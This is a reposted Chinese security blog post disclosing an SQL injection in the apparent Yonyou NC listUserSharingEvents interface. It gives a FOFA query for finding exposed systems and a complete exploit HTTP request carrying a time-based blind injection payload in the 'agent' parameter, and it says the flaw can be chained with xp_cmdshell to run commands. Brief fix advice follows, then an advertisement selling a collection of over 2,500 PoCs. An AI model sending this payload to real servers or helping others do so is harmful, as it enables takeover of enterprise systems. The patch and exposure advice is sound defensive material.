文章总结： 该文档披露用友NC系统listUserSharingEvents接口存在SQL注入漏洞，攻击者可通过构造恶意参数利用数据库xp_cmdshell执行任意命令控制服务器。漏洞利用难度低，作者提供FOFA搜索语法、漏洞复现请求示例及nuclei检测脚本，建议通过关闭互联网暴露面或升级系统进行修复。 综合评分： 75 文章分类： 漏洞分析,WEB安全,漏洞预警

用友NC listUserSharingEvents sql注入漏洞

原创

北雪网络安全 北雪网络安全

北雪网络安全

2026年5月1日 12:22 山东

在小说阅读器读本章

去阅读

本文章所描述的内容仅供网络安全学习使用，任何人不允许学到技术内容进行非法系统测试，作者不对任何学习文章并进行非法操作的行为负责，由本人自己承担后果，本文章仅供技术学习。

01

更多内容

网络安全学习知识库每日添加最新漏洞并提供python与 nuclei 批量探测脚本：https://pc.fenchuan8.com/#/index?forum=110296

02

搜索引擎

Fofa：app=”用友-UFIDA-NC” && icon_hash=”1085941792″

03

漏洞复现

漏洞概述：用友NC listUserSharingEvents 接口存在SQL注入漏洞，攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令，从而控制服务器。经过分析与研判，该漏洞利用难度低，建议尽快修复。

GET /portal/pt/oacoSchedulerEvents/listUserSharingEvents?agent=1')+AND+1=dbms_pipe.receive_message('RDS',5)--&pageId=login&sch_ed=2&sch_sd=1 HTTP/1.1Host: your-ipAccept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0)Gecko/20100101 Firefox/139.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

04

自查工具

05

修复建议

1、关闭互联网暴露面或接口设置访问权限

2、升级至安全版本

06

内部圈子

🛠️ 【知名漏洞实战圈，纯干货】🛠️

还在找公开漏洞POC而烦恼？还在为漏洞不会验证而发愁？还在为发现不了漏洞而自卑？这里漏洞圈子解决你的困惑！ 目前已更新poc数量2500+

🎯 适用场景

▫️渗透测试▫️企业漏洞自查▫️攻防演练▫️安全服务▫️合规运营****

⚠️ 重要声明：

▫️仅限合法授权测试，严禁违规使用

▫️虚拟资源服务，购买后不接受任何形式退款

        ▫️付款前请评估需求，慎重考虑

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：北雪网络安全 北雪网络安全 北雪网络安全《用友NC listUserSharingEvents sql注入漏洞》